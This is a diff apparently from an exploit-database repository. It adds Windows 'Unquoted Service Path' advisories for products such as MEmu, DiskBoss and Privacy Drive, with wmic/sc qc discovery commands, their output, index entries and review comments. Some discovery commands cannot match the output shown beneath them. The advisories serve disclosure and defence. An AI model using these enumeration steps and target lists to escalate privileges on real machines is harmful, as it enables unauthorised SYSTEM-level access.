NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea RT Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
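Review bot: The discovery command filters on `findstr /i "CodeMeter"`, but the output line beneath it is for AERTFilters and does not contain that string, so the command as written cannot have produced it. Replace the filter with the name of the service actually being reported, or drop that stage, so the step is reproducible.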

@ -0,0 +1,24 @@
#Exploit Title: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-07
#Vendor : Microvirt
#Version : Microvirt MEMU 3.7.0
#Vendor Homepage : https://www.memuplay.com/
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\Users\Sam Sanz>sc qc "MEmusvc"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: MEmusvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Microvirt\MEmu\MemuService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : MEmusvc
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

@ -0,0 +1,26 @@
#Exploit Title: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-07
#Vendor : Magic Utilities Pty
#Version : 64-bit 2.20
#Vendor Homepage : https://magicutilities.net/magic-mouse/home
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\>sc qc "magicmouse2service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: magicmouse2service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Magic Mouse 2 -
Utilities\MagicMouse2Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Magic Mouse 2 Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

@ -0,0 +1,30 @@
# Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
# Discovery by: Leslie Lara
# Discovery Date: 7-09-2020
# Vendor Homepage: https://www.huawei.com/en/corporate-information
# Software Links : https://www.advanceduninstaller.com/iDesk-3_0_2_1-ac22913ee90dd58ca897d1ddf3d62a8f-application.htm
# Tested Version: 3.0.2.1
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
iDeskService
iDeskService C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
Auto
C:\>sc qc "iDeskService"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: iDeskService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : iDeskService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
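Review bot: Discovery Date `7-09-2020` is ambiguous between 7 September and 9 July and differs from the YYYY-MM-DD form used by most entries in this commit; write it in ISO form. The Vendor Homepage is Huawei's corporate-information page and the Software Link is an uninstaller-database listing, neither of which lets a reader obtain or verify the tested build, and the entry has no impact statement after the `sc qc` output.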

@ -0,0 +1,35 @@
# Exploit Title: Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path
# Discovery by: Carlos Roa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home
# Tested Version: 5.1.0.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Professional 64 bits (spanish)
# Step to discover Unquoted Service Path:
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v "C:\Windows\\" | findstr /i /v """
Canon Inkjet Printer/Scanner/Fax Extended Survey Program IJPLMSVC C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE Auto
# Service info:
C:\Users>sc qc IJPLMSVC
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ijplmsvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Canon Inkjet Printer/Scanner/Fax Extended Survey Program
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

@ -0,0 +1,37 @@
# Exploit Title: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path
# Discovery by: Paulina Girón
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.deepinstinct.com/
# Software Links : https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/
# Tested Version: 1.2.24.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro 64 bits
1)
C:\> wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DeepNetworkService" |findstr /i /v """
Deep Instinct Network Service DeepNetworkService C:\Program Files\HP Sure Sense\DeepNetworkService.exe Auto
2)
C:\> sc qc "DeepNetworkService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DeepNetworkService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\HP Sure Sense\DeepNetworkService.exe
GRUPO_ORDEN_CARGA : FSFilter Anti-Virus
ETIQUETA : 0
NOMBRE_MOSTRAR : Deep Instinct Network Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Description Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
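Review bot: The title and header name the product as Deep Instinct Windows Agent 1.2.24.0, but the binary path in both outputs is under `C:\Program Files\HP Sure Sense\`, and the Software Link is a press article rather than a download. State that the tested install is the HP Sure Sense bundle and which Sure Sense version carries agent 1.2.24.0, so administrators can identify affected machines from their software inventory. Steps `1)` and `2)` would also read better with the descriptive labels the other entries use.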

@ -0,0 +1,32 @@
# Exploit Title: RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.real.com/
# Tested Version: 18.1.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Enterprise SP1 x64 es
# Step to discover Unquoted Service Path:
c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr
/i /v "C:\Windows\\" | findstr /i /v "RealTimes" | findstr /i /v """
RealTimes Desktop Service RealTimes Desktop Service c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe Auto
# Service info
sc qc "RealTimes Desktop Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: RealTimes Desktop Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : RealTimes Desktop Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
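
Review bot: the discovery command cannot produce the output line shown beneath it, because `findstr /i /v "RealTimes"` uses /v and therefore drops every line containing "RealTimes", including the "RealTimes Desktop Service" row. Remove /v from that one filter; the Deep Instinct entry in this commit uses `findstr /i "DeepNetworkService"` for the same step. The command also begins `c:\wmic` with no `>` after the prompt, and the sentence under "#Exploit:" is not prefixed with `#` like the header lines, so the file mixes commentary and captured output without a marker.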

@ -0,0 +1,101 @@
# Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path
# Date: 2020-8-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.diskboss.com/
# Software Link: https://www.diskboss.com/downloads.html
# Version: v11.7.28
# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
# Product | Version
# DiskBoss v11.7.28
# DiskBoss Pro v11.7.28
# DiskBoss Ultimate v11.7.28
# DiskBoss Server v11.7.28
# DiskBoss Enterprise v11.7.28
# All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services.
# Services info:
C:\Users\m507>sc qc "DiskBoss Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\DiskBoss\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Enterprise"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Enterprise
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Ultimate Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Ultimate Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Ultimate Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Server"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Server
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
C:\Users\m507>sc qc "DiskBoss Pro Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: DiskBoss Pro Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DiskBoss Pro Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
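
Review bot: the statement "Any low privileged user can elevate their privileges using any of these services" is not backed by anything in the entry, which contains only `sc qc` output. All five BINARY_PATH_NAME values are unquoted and run as LocalSystem, but whether a low-privileged user is affected depends on write access to the directories ahead of each space (`C:\` and, for the four x86 installs, `C:\Program Files (x86)`), and no permissions listing is shown for the Windows Server 2019 test host. Either include that evidence or soften the claim to match the closing line's "could permit". For "DiskBoss Service" the only space is in `Program Files`, so that case rests entirely on the ACL of `C:\`.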

@ -0,0 +1,28 @@
# Exploit Title: Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path
# Date: 2020-8-20
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: https://www.cybertronsoft.com/
# Software Link: https://www.cybertronsoft.com/download/privacy-drive-setup.exe
# Version: Version 3.17.0 Build 1456
# Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc PDSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: PDSvc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Cybertron\Privacy Drive\pdsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PrivacyDrive Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
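
Review bot: the sentence under "# Exploit:" is left uncommented and is the same generic line used in the DiskBoss entry; it says nothing about what the `sc qc` output above it actually shows, namely an unquoted BINARY_PATH_NAME with spaces in `Program Files (x86)` and `Privacy Drive`, SERVICE_START_NAME LocalSystem, and TYPE 110 (interactive). Suggest stating those points in the description, adding the permissions on the parent directories from the test host so the impact can be judged, and giving the fix (quote the binary path in the service configuration). "Date: 2020-8-20" should be zero-padded to match the 2020-11-09 format used in the index.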

@ -10400,6 +10400,27 @@ id,file,description,date,author,type,platform,port
48982,exploits/windows/local/48982.pdf,"Foxit Reader 9.7.1 - Remote Command Execution (Javascript API)",2020-11-02,"Nassim Asrir",local,windows,
48983,exploits/windows/local/48983.txt,"Quick N Easy FTP Service 3.2 - Unquoted Service Path",2020-11-02,yunaranyancat,local,windows,
48993,exploits/windows/local/48993.pl,"Amarok 2.8.0 - Denial-of-Service",2020-11-05,FishballAndMeatball,local,windows,
49002,exploits/windows/local/49002.txt,"HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
49003,exploits/windows/local/49003.txt,"KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49004,exploits/windows/local/49004.txt,"Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49005,exploits/windows/local/49005.txt,"OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
49006,exploits/windows/local/49006.txt,"IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49008,exploits/windows/local/49008.txt,"DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49009,exploits/windows/local/49009.txt,"Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path",2020-11-09,"Julio Aviña",local,windows,
49010,exploits/windows/local/49010.txt,"HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path",2020-11-09,"Jocelyn Arenas",local,windows,
49011,exploits/windows/local/49011.txt,"Motorola Device Manager 2.4.5 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49012,exploits/windows/local/49012.txt,"Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49013,exploits/windows/local/49013.txt,"Motorola Device Manager 2.5.4 - 'ForwardDaemon.exe ' Unquoted Service Path",2020-11-09,"Angel Canseco",local,windows,
49014,exploits/windows/local/49014.txt,"Realtek Andrea RT Filters 1.0.64.10 - 'AERTSr64.EXE' Unquoted Service Path",2020-11-09,"Erika Figueroa",local,windows,
49016,exploits/windows/local/49016.txt,"MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49017,exploits/windows/local/49017.txt,"Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,
49018,exploits/windows/local/49018.txt,"iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path",2020-11-09,"Leslie Lara",local,windows,
49019,exploits/windows/local/49019.txt,"Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path",2020-11-09,"Carlos Roa",local,windows,
49020,exploits/windows/local/49020.txt,"Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path",2020-11-09,"Paulina Girón",local,windows,
49021,exploits/windows/local/49021.txt,"RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path",2020-11-09,"Erick Galindo",local,windows,
49022,exploits/windows/local/49022.txt,"DiskBoss v11.7.28 - Multiple Services Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
49023,exploits/windows/local/49023.txt,"Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path",2020-11-09,"Mohammed Alshehri",local,windows,
42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
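
Review bot: id 49015 is missing from the added rows, which go from 49014 straight to 49016; confirm that the gap is intentional and not a dropped entry. The descriptions for 49011 and 49013 carry a trailing space inside the quotes ('ForwardDaemon.exe '), and 49019 has an extra " - " before "Unquoted Service Path" that the other titles do not. Normalising these keeps title searches and de-duplication against the CSV reliable.
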
@ -40818,6 +40839,9 @@ id,file,description,date,author,type,platform,port
48997,exploits/php/webapps/48997.py,"Sentrifugo 3.2 - 'assets' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
48998,exploits/php/webapps/48998.py,"Sentrifugo Version 3.2 - 'announcements' Remote Code Execution (Authenticated)",2020-11-06,"Fatih Çelik",webapps,php,
48999,exploits/aspx/webapps/48999.txt,"BlogEngine 3.3.8 - 'Content' Stored XSS",2020-11-06,"Andrey Stoykov",webapps,aspx,
49000,exploits/hardware/webapps/49000.txt,"Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF",2020-11-09,"Jinson Varghese Behanan",webapps,hardware,
49001,exploits/php/webapps/49001.py,"SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)",2020-11-09,"M. Cory Billington",webapps,php,
49024,exploits/multiple/webapps/49024.txt,"Joplin 1.2.6 - 'link' Cross Site Scripting",2020-11-09,"Philip Holbrook",webapps,multiple,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
